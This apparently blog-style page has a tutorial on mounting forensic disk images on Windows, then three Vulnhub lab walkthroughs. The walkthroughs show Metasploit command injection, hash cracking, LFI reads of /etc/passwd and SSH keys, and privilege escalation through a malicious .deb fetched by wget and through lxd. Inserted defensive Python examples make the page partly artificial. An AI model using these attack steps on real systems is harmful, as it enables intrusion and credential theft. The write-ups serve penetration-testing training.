Multiple Ways to Mount Raw Images (Windows)


In this article, we are going to learn how to mount a forensic image on a Windows machine. There are multiple ways to accomplish this, and tools like OSFMount and Arsenal Image Mounter will help us in the process. So, let's start.
Table of Content
·         Introduction
·         Why Mount an Image?
·         Mounting Tools
o   Mount Image Pro
o   OSFMount
o   Arsenal Image Mounter
o   Access Data FTK Imager
Introduction
In the digital forensics world, a forensic image is a complete sector-by-sector copy of a hard drive or external drive. Generally, a forensic image is used as evidence in a forensic investigation. Because every sector is copied, these images include unallocated space, slack space and boot records. Different computer forensic tools use different formats to generate forensic images.
Some common forensic image formats are RAW, E01 and AFF. We can use a variety of tools to mount and analyze such an image to get better investigative results.
Why Mount an Image?
Mounting is the process that presents a RAW logical image as a mounted drive or directory so that its file system can be browsed. To examine a forensic image in detail, mounting is preferred. There are various tools that can be used to mount a RAW image; let's learn the mounting process with each of them. Although the basic procedure is the same, there are times when an investigator cannot use their preferred tool, and each investigative company uses different tools. So a good investigator should know the different tools in order to widen their ability and robustness.
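The tools below all ask the same two questions of a raw image: mount the whole disk or one partition, and at what sector size. The following is an added example, not code from the article or from any of the tools, showing where those answers come from in a raw (dd) image: the MBR partition table in its first sector. The sample image is constructed inline and the 512-byte sector size is an assumption.

```python
"""Parse the MBR partition table of a raw (dd) image and record its hash.
Added example, not code from any tool on this page; the sample image is
constructed inline and the 512-byte sector size is an assumption."""
import hashlib
import struct
from typing import Dict, List

SECTOR = 512  # assumed sector size; the tools above let you override it


def parse_mbr(image: bytes, sector_size: int = SECTOR) -> List[Dict]:
    """Return the non-empty entries of the four-slot MBR partition table.

    Each 16-byte entry starts at offset 446 + 16*i and the sector ends with
    the 0x55AA signature.  Offsets and sizes are returned in bytes, which is
    what a tool needs when it mounts one partition out of a whole-disk image.
    """
    if len(image) < 512 or image[510:512] != b"\x55\xaa":
        raise ValueError("no MBR signature: not a whole-disk image (maybe a partition image)")
    parts = []
    for i in range(4):
        entry = image[446 + 16 * i:446 + 16 * (i + 1)]
        # boot flag, 3 CHS bytes (ignored), type, 3 CHS bytes, LBA start, sector count
        boot, ptype, lba_start, n_sectors = struct.unpack("<B3xB3xII", entry)
        if ptype == 0 or n_sectors == 0:
            continue  # empty slot
        parts.append({
            "index": i,
            "bootable": boot == 0x80,
            "type": ptype,  # e.g. 0x07 NTFS/exFAT, 0x0C FAT32 (LBA), 0x83 Linux
            "offset": lba_start * sector_size,
            "size": n_sectors * sector_size,
        })
    return parts


def image_sha256(image: bytes) -> str:
    """Hash of the whole image.  Record it before mounting and again after the
    analysis: matching values show the read-only mount left the evidence intact."""
    return hashlib.sha256(image).hexdigest()


def build_sample_image() -> bytes:
    """Constructed stub: an MBR describing a bootable NTFS partition at sector
    2048 and a Linux partition after it, followed by a little zero padding.
    Only the MBR sector is meaningful; the partitions describe a larger disk."""
    mbr = bytearray(512)
    mbr[446:462] = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 20480)
    mbr[462:478] = struct.pack("<B3xB3xII", 0x00, 0x83, 22528, 40960)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr) + bytes(SECTOR * 7)


if __name__ == "__main__":
    img = build_sample_image()
    print("sha256:", image_sha256(img))
    for p in parse_mbr(img):
        print(f"partition {p['index']}: type 0x{p['type']:02x} "
              f"offset {p['offset']} bytes size {p['size']} bytes")
```

Run it against a real image by replacing `build_sample_image()` with the first 512 bytes read from the file; an E01 or AFF container must be converted or exposed as raw first, since only a raw image starts with the MBR.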
Tool #1: Mount Image Pro
Mount Image Pro is a tool that is quite useful in forensic investigations. It enables mounting images in all the common forensic image formats. Some of them are:
·         .RAW
·         .E01 (Encase Image)
·         .A01
·         .dd
This tool is developed by GetData, a renowned provider of end-user software for data recovery, file recovery, computer forensics and file previewing. Their products are designed for getting data back from systems and their hard drives.
We can download Mount Image Pro from here.
Once Mount Image Pro is downloaded and installed, launch the tool using the icon created on the desktop. After launching the app, we need to press the Mount icon to get started.

We can also open the File drop-down menu and choose the “Mount Image File” option to move ahead.

After this, we need to select the image file on our hard drive and click the “Open” button to open it.

Now we need to select a few options to get started. The first one is how we want to mount our image. We want the image to be mounted and shown as a partition in Explorer, hence we choose the Disk option; if you want to investigate the image as a directory, choose File System instead. Next is the location where we want to mount. If we chose the File System option, we need to specify the destination directory; otherwise we choose a letter that will act as the drive letter (such as Local Disk D: or E:). Next, in the Disk options panel, we checked Plug and Play so that dismounting is easier. Now we select the kind of access that we want: we choose Read Only access. We can also customize the sector size of the partition. After giving all the required details, press the OK button.

After this, mounting starts and we get live progress of the process through the status bar, as depicted below.

After completion, we will get our mounted image and we can start our investigation.

As the screenshot shows, it mounted our forensic image as the F: drive. Now we can analyze it and get the same view of the files as the user had on their system.
OSFMount
OSFMount is software that allows us to mount local disk image files (sector-by-sector copies of an entire disk or disk partition) on a Windows system. We can then analyze the disk with PassMark's other tool, OSForensics. By default, the image files are mounted read-only so that our original image files do not get altered.
This software supports mounting disk image files in any mode, whether we want them read-only, writable, or in write-cache mode.
We can download OSFMount from here.
Let's begin by opening OSFMount after completing its installation. The developers at PassMark gave us a neat, very minimalistic UI to work with. To begin, we hit the “Mount New” button.

After that, we follow a series of steps where we fill in the required details.
Step #1: We need to provide the source of the image file to mount for our investigation.
After filling in details, we hit the Next button.

Step #2: We need to select if we want a specific partition or we want the entire image mounted for investigation.

After that step, we finalize things. In the last step we select a few details regarding our image. These are additional options that we may or may not want to include in our process: whether to mount the image as removable media, the drive type, the drive letter, drive emulation, etc.
After filling in all the details and completing all the steps, click on the Mount button to start mounting the image file.


Now, as shown in the image below, we have the image successfully mounted and ready for analysis.

We can also verify the mounted image by opening it in File Explorer, as shown in the image below:


Arsenal Image Mounter
Arsenal Image Mounter (AIM) handles disk images as whole drives. As far as Windows is concerned, the contents of disk images mounted by AIM are real SCSI disks, which allows its users to take advantage of disk-specific features like integration with Disk Management, access to Volume Shadow Copies, and much more.
Many of the image mounting solutions on the market present the contents of disk images as shares or partitions rather than complete disks, which sometimes limits their usefulness to digital forensics practitioners and investigators. If AIM is running without a license, it runs in free mode and provides the core functionality; if it is licensed, it runs in professional mode with full functionality enabled.
We can download Arsenal Image Mounter from here.
After downloading and installing it, we can open the software and start mounting an image file by clicking on the “Mount disk image” button.

Now we have some details to fill in. We are asked about the mode in which we want to mount our image, i.e. what type of device it should be: we can choose Read Only or Writable, among other options. We also need to fill in the sector size and tick Create “removable” disk device. After filling in all the details, click on the OK button to move further.

After this, our disk is mounted successfully, and we get all the details about it along with the mounted message.

Now we check that our image is successfully mounted as a removable device on our system. After that, we can finally start our investigation.


Access Data FTK Imager
AccessData claims that FTK lets investigators zero in on relevant evidence quickly, conduct faster searches, and dramatically increase analysis speed. FTK uses distributed processing and is built to fully leverage multi-core and multi-threaded computers; where other tools leave modern hardware under-used, FTK tries to use 100 percent of the available hardware resources to help the investigation process.
FTK provides faster searching in comparison to other solutions. FTK is database-driven: all data is stored securely and centrally, which allows teams to work from the same database and reduces the cost of creating multiple data sets.
We can download AccessData FTK Imager from here.
After finishing the installation, open the software to move ahead.

Now click on File in the menu and select the “Image Mounting” option to start the image mounting process.

Now we use the Add Image File option, browse to the image file on the system, and then fill in details like the mount type, the drive letter and the mount method.
After filling in all the mandatory details, click on the Mount button to start the mounting process.

It takes some time to mount an image, but after the process finishes we get the details of our mounted image in the Mapped Images section. It provides basic information such as the drive, method, partition and image location.


If we want to check the integrity of the mounted data, we can do so by browsing to the drive location, validating its contents, and then starting our investigation.

These are the different ways in which we can mount a forensic image on Windows. They help investigators analyze the evidence better during their investigation.
Author: Shubham Sharma is a Pentester, Cybersecurity Researcher and Enthusiast, contact here.

Five86:1 Vulnhub Walkthrough


Today we are sharing another CTF walkthrough, of the Vulnhub machine named Five86-1, with the intent of gaining experience in the world of penetration testing. Credit goes to m0tl3ycr3w and Syed Umar for designing this machine, and the level is set to beginner to advanced.
According to the author: The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Penetration Testing Methodologies
Network Scanning
·        Netdiscover
·        Nmap
Enumeration
·        Exploring HTTP services
Exploit OpenNetAdmin
·        Command Injection (Metasploit)
·        Crack the hashes (john)
Privilege Escalation
·        Abusing Sudo
·        Abusing SUID

Walkthrough

Network Scanning
As you know, this is the initial phase, where we use netdiscover to scan the network and identify the host IP; here we have 192.168.0.126 as our host IP.



In our next step, we use nmap for port enumeration. We scanned the host and found port 80 open for HTTP; moreover, we also found a robots.txt with a Disallow entry for /ona, as shown in the image below.



Enumeration
Thus, we open the /ona URL in a web browser and find that the OpenNetAdmin application is running on the web server and disclosing its installed version.




As we noticed that OpenNetAdmin version 18.1.1 is installed on the host machine, we searched for an exploit and found a Ruby Metasploit module on Exploit-DB for a command injection vulnerability in OpenNetAdmin. Without wasting time, we downloaded the module to our local machine.



Next, we copied the downloaded Ruby file into the Metasploit Framework's module directory so that we could use the module against the host.



Exploit
After copying the exploit into the Metasploit Framework, you need to reload the module database and load the module.
We got our Meterpreter session after running the following commands:
use exploit 47772
set rhosts 192.168.0.126
set lhost 192.168.0.132
exploit



So, we successfully exploited the host machine and spawned a shell as www-data. We then moved on to post-exploitation enumeration for privilege escalation and found a “.htaccess” file inside /var/www/html/reports. Reading .htaccess gave us the path of the .htpasswd file, i.e. “/var/www/.htpasswd”, and reading .htpasswd gave us the hash for the user “douglas”. In the .htpasswd file, the author has left a hint for the password, as shown in the image.



So, we learned that the password is a 10-character string built from the letters "aefhrt", so we need to prepare a dictionary of 10-character passwords. Here we use crunch to create the dictionary, executing the following command to follow the pattern the author described.
crunch 10 10 aefhrt > dict.txt
With the above command we generated the dictionary and used John the Ripper to crack the hash. Here I saved the hash described above in a text file called "hash" and used the dict.txt wordlist to crack it with the following command.
john --wordlist=/root/dict.txt hash

As a result, we found the password “fatherrrr” for the given hash.



Privilege Escalation

From the shell on the host machine, we switch to douglas using the password cracked above. Signed in as douglas, we checked his sudo rights and found that he could run the copy program (cp) as "jen".



Since the author has granted douglas sudo rights to run cp as jen, we can copy douglas's SSH public key into /home/jen/.ssh so that we can log in as jen. Thus, we executed the following commands.
cat id_rsa.pub > /tmp/authorized_keys
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh



Now copy douglas's id_rsa into the /tmp directory, fix its permissions, and then SSH to localhost as jen.
cd .ssh
cp id_rsa /tmp
cd /tmp
chmod 600 id_rsa
ssh -i id_rsa jen@127.0.0.1

Hmm! When we connected over SSH as jen, we found another hint, “you have a new mail”, in the SSH login banner, as shown in the image.



So, we find a file named "jen" in /var/mail that contains jen's email. According to this message, jen knows the password for the Moss account, so we can use the Moss credentials for our next move.



So, we switched from jen's account to Moss and searched for SUID-enabled files; luckily, we found that the SUID bit is set on "upyourgame", as shown in the image.
find / -perm -u=s -type f 2>/dev/null
cd .game
./upyourgame 
So we navigate to /home/Moss/.game/ and run the "upyourgame" program. It asks a series of questions that can only be answered YES or NO, and at the end we get a root shell and find the final flag in the /root directory, as shown below.



Symfonos:5 Vulnhub Walkthrough


This is another post on a Vulnhub CTF, named “symfonos”, by Zayotic. It is designed for the VMware platform and is a boot-to-root challenge where you have to find the flags to finish the task assigned by the author.
You can download it from here: https://www.vulnhub.com/entry/symfonos-5,415/

Level: Intermediate

Penetration Testing Methodologies
Scanning
·        Netdiscover
·        Nmap
Enumeration
·        Abusing HTTP
·        Dirb
Exploiting LFI
·        Burp Suite
Privilege Escalation
·        Exploiting Dpkg

Walkthrough

Scanning
Let's start off with the scanning process. This target VM automatically took the IP address 192.168.0.112 from our local Wi-Fi network.
Then we used Nmap for port enumeration and found that port 22 (SSH), port 80 (HTTP), and ports 389 and 636 (LDAP) are open.
nmap -p- -A 192.168.0.112


Enumeration
As port 80 is open, we tried opening the IP address in our browser, but we didn't find anything useful on the web page.


Next we used dirb for directory brute-forcing and, on executing the following command, found the /admin.php page with status code 200 OK.
dirb http://192.168.0.112


When we opened the page listed above, i.e. /admin.php, we got a login page, but we did not know the credentials. We tried to bypass the login with SQL injection and brute-force attacks, but unfortunately nothing was achieved.


Therefore, we next used Burp Suite to intercept the browser's request for the current web page and analyze it. We sent the request to Repeater and found a suspicious hyperlink inside the response.
We suspected a possible LFI here because the URL loads the portraits.php file via localhost, as shown in the image.


To confirm the LFI vulnerability, we tried to pull the “/etc/passwd” file through the parameter “/home.php?url=”, and it worked as expected.


Exploit LFI

As a result, we successfully got the content of the “admin.php” file by exploiting the LFI through the same parameter. As we knew, the http://192.168.0.112/admin.php page requires login credentials, and here we found the credentials “username: admin” and “password: qMDdyZh3cT6eeAWD”, which are actually used to connect to LDAP.


Next we used nmap for LDAP enumeration, running the following command, and as a result we found user information including a password.

nmap 192.168.0.112 -p 389 --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local", ldap.password="qMDdyZh3cT6eeAWD"'
zeus
cetkKf4wCuHC9FET


Privilege Escalation

Thus, we used the zeus credentials enumerated above to access the host machine over SSH and checked his sudo rights. We found that zeus has sudo permission to run dpkg as root, so we abuse these sudo rights for privilege escalation by exploiting dpkg's functionality.


As we know, dpkg is a package installer, just like apt, on Linux-like operating systems, so here we are going to craft a Debian package with the help of fpm, transfer it to the host machine, and install it to get a privileged shell.

mkdir ignite
cd ignite
nano shell.sh
Write the following code in the shell.sh file and save it.
#!/bin/bash
/bin/bash
Install fpm on your local machine and run the following command to generate a Debian package from the shell.sh file.

fpm -s dir -t deb -n exploit --before-install shell.sh ./
ls
python -m SimpleHTTPServer

Note: You will need to install FPM on your machine.


Once the malicious .deb package is generated, download it onto the host machine and install it as root. Run the following commands to perform the privilege escalation and get a root shell, where you will find proof.txt, as shown in the image.

wget http://192.168.0.114:8000/exploit_1.0_amd64.deb
sudo -u root /usr/bin/dpkg -i exploit_1.0_amd64.deb
id
cd /root
cat proof.txt




Reference: https://gtfobins.github.io/gtfobins/

CyNix:1 Vulnhub Walkthrough


Today we are sharing another CTF walkthrough, of the machine named CyNix posted on Vulnhub. Credit goes to “Sumit Verma”, and the difficulty level is set to Intermediate-Hard. You have to hunt two flags, and this is a boot-to-root challenge. Download it from here.

Table of Content
Network Scanning
·         Netdiscover
·         Nmap
Enumeration
·         Abusing HTTP
·         DirBuster
Exploiting LFI
·         Burp Suite
Privilege Escalation
·         Lxd

Walkthrough

Network Scanning
As you know, this is the initial phase, where we use netdiscover to scan the network and identify the host IP; here we have 192.168.1.105 as our host IP.



In our next step we use nmap for port enumeration. We ran the following command and found that port 80 is open for HTTP and port 6688 for SSH, and that the host is running a Linux-based OS.
nmap -p- -A 192.168.1.105



Enumeration
After network scanning, enumeration is the next phase, because it helps a pentester dig out suspicious information or loopholes in the installed applications. We therefore browsed to the host IP in a web browser, as shown, but unfortunately found nothing except the Apache default page.



We continue with a directory brute-force attack, using DirBuster for directory listing. As you can see, we found a directory named /lavalamp. To learn more about DirBuster, read the article here.



Browsing to /lavalamp in the web browser, we are welcomed by the web page shown in the image. We dug further, including into its source code, but found no hint for the next step.



So we filled out the contact form, as shown in the image below, and intercepted the browser's HTTP request.



The intercepted request shows that the HTTP POST method is used to submit the form to the /canyoubypassme.php page.



Thus, we navigated to /lavalamp/canyoubypassme.php as found above and got the web page shown below, which displays only an image.



As the web page displayed only the image, which puzzled us, we checked its source code and noticed a hidden form with an opacity of 0 inside the page.



With the help of Inspect Element, we changed the opacity from 0 to 1 and made the form visible on the web page.



Now it was time to enter a number in the form and intercept its HTTP request. In Burp Suite we saw the parameter "file=1"; since that hinted at a possible LFI, we sent the request to Repeater.



To validate the LFI, we requested the /etc/passwd file by injecting “../../../etc/passwd” into the “file” parameter and checked the response.
Luckily, we found that the application is vulnerable to LFI, and in the result we noticed entries for the users “ford” and “lxd”.



Exploiting LFI
Since SSH is installed on the host machine, we also checked for an SSH RSA key by injecting “../../../home/ford/.ssh/id_rsa” into the “file” parameter, and as a result we found ford's id_rsa key.
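Symfonos:5's home.php?url= and CyNix's file= parameter fail the same way: a file name taken from the request is joined onto the web root, so "../" walks out of it to /etc/passwd or a user's id_rsa. Below is an added example, not code from either VM, showing that flawed resolution next to a hardened one; the web root and the extension allowlist are assumed values.

```python
"""Path guard for the 'include the file named in a request parameter'
pattern behind the home.php?url= and file= LFIs above.  Added example, not
code from either VM; WEB_ROOT and the extension allowlist are assumptions."""
import os
from typing import Optional

WEB_ROOT = "/var/www/html"            # assumed document root
ALLOWED_SUFFIXES = (".php", ".html")  # assumed: the only includable file types


def vulnerable_resolve(param: str) -> str:
    """The flawed pattern: the parameter is joined straight onto the web root,
    so each '../' walks one directory up and out of it."""
    return os.path.normpath(os.path.join(WEB_ROOT, param))


def safe_resolve(param: str) -> Optional[str]:
    """Return an absolute path inside WEB_ROOT, or None when the request
    must be refused.  Three independent checks, any one of which is enough
    to stop the /etc/passwd and ~/.ssh/id_rsa reads shown above:
      1. reject empty, absolute and NUL-containing parameters outright;
      2. canonicalise with realpath (it also follows symlinks, which a
         purely lexical normpath would not) and require the result to stay
         under the canonical web root;
      3. require an allowlisted extension, so that even a future weakening
         of check 2 cannot serve arbitrary files."""
    if not param or "\x00" in param or os.path.isabs(param):
        return None
    root = os.path.realpath(WEB_ROOT)
    candidate = os.path.realpath(os.path.join(root, param))
    if os.path.commonpath([root, candidate]) != root:
        return None
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None
    return candidate


def is_traversal_attempt(param: str) -> bool:
    """Detection helper: True when the parameter would have escaped the web
    root under the vulnerable logic.  The same test can be run over the
    query strings in web server access logs to flag probing like the above."""
    escaped = os.path.normpath(os.path.join(WEB_ROOT, param))
    return os.path.commonpath([WEB_ROOT, escaped]) != WEB_ROOT
```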



We copied the id_rsa key into a text file named “key”, set its permissions to 600, and finally logged in over SSH (which is listening on port 6688, as found by nmap) to get a shell on the machine.

chmod 600 key
ssh -i key -p 6688 ford@192.168.1.105
We found our first flag, user.txt, inside ford's home directory. For privilege escalation we checked the user's id and saw that ford is a member of the lxd group, so we can go with lxd privilege escalation, which we explained in our previous article.
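The three escalations in these walkthroughs (cp as jen in Five86, dpkg as root in Symfonos:5, and ford's lxd membership here) are all misconfigurations an administrator can find by auditing /etc/sudoers and /etc/group. The following is an added example, not code from any of the VMs; its sudoers and group lines are constructed, and its list of shell-escape binaries is a small subset of the GTFOBins catalogue the Symfonos post references.

```python
"""Audit the two local privilege-escalation conditions used in the
walkthroughs above: sudo rules on shell-escape-capable binaries (cp run as
jen in Five86, dpkg run as root in Symfonos:5) and membership of the lxd
group (ford in CyNix:1).  Added example, not code from any of the VMs; the
sudoers and /etc/group text is constructed and the binary list is a small
subset of the GTFOBins catalogue referenced above."""
import re
from typing import List, Tuple

# Binaries that read/write arbitrary files or spawn a shell when run under
# sudo; extend this from GTFOBins for a real audit.
SHELL_ESCAPE_BINARIES = {"cp", "dpkg", "apt", "apt-get", "find", "vim", "vi",
                         "less", "awk", "python", "python3", "perl", "tar"}
# Membership of these groups is root-equivalent (lxd: mount / into a
# privileged container, as the CyNix walkthrough shows).
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "disk", "sudo", "wheel"}
# user  host=(runas[:group]) [TAG:]... command[, command]...
SUDO_RULE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
                       r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudoers(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (user, runas, command, reason) for every risky rule."""
    findings = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = SUDO_RULE.match(line)
        if not m:
            continue
        user = m["user"]
        runas = (m["runas"] or "root").split(":")[0]  # run-as defaults to root
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if cmd == "ALL":
                findings.append((user, runas, cmd, "unrestricted command"))
            elif cmd:
                binary = cmd.split()[0].rsplit("/", 1)[-1]
                if binary in SHELL_ESCAPE_BINARIES:
                    reason = f"{binary} can read/write files or spawn a shell as {runas}"
                    reason += " (NOPASSWD)" if nopasswd else ""
                    findings.append((user, runas, cmd, reason))
    return findings


def audit_groups(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (member, group) for every member of a root-equivalent group."""
    findings = []
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) == 4 and fields[0] in ROOT_EQUIVALENT_GROUPS and fields[3]:
            findings.extend((member, fields[0]) for member in fields[3].split(","))
    return findings


# Constructed samples modelled on the three machines above.
SAMPLE_SUDOERS = [
    "# /etc/sudoers (constructed)",
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "douglas ALL=(jen) NOPASSWD: /bin/cp",
    "zeus ALL=(root) NOPASSWD: /usr/bin/dpkg",
    "jen ALL=(root) /usr/bin/systemctl status nginx",
]
SAMPLE_GROUP = ["root:x:0:", "sudo:x:27:", "lxd:x:108:ford", "users:x:100:"]
```

On a real host, feed `audit_sudoers` the lines of /etc/sudoers and /etc/sudoers.d/* and `audit_groups` the lines of /etc/group; the root entry is reported too, so filter it if you only want non-root accounts.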



Privilege Escalation
In order to escalate to root on the host machine, you have to create an image for lxd, so you need to perform the following actions:
1.       Steps to be performed on the attacker machine:
§  Download build-alpine to your local machine from its git repository.
§  Execute the script “build-alpine”, which builds the latest Alpine image as a compressed file. This step must be executed as root.
§  Transfer the tar file to the host machine.
2.       Steps to be performed on the host machine:
§  Download the Alpine image.
§  Import the image into lxd.
§  Initialize the image inside a new container.
§  Mount the host's root file system inside the container.
So, we downloaded build-alpine from its GitHub repository.


git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine



On running the above commands, a tar.gz file is created in the working directory, which we transfer to the host machine using a simple HTTP server.
python -m SimpleHTTPServer



On the other side, we download the Alpine image into the /tmp directory on the host machine.
cd /tmp
wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
After the image is built it can be added as an image to LXD as follows:
lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
Use the list command to check the list of images, then initialize a privileged container from it, mount the host's / at /mnt/root inside it, and start a shell in the container.
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
Once inside the container, navigate to /mnt/root to see all the resources of the host machine.
After running lxc exec, we see that we have a different shell: the shell of the container, which has all the files of the host machine mounted under /mnt/root. So we looked for the root flag and found it.
cd /mnt/root/root
ls
flag.txt
cat flag.txt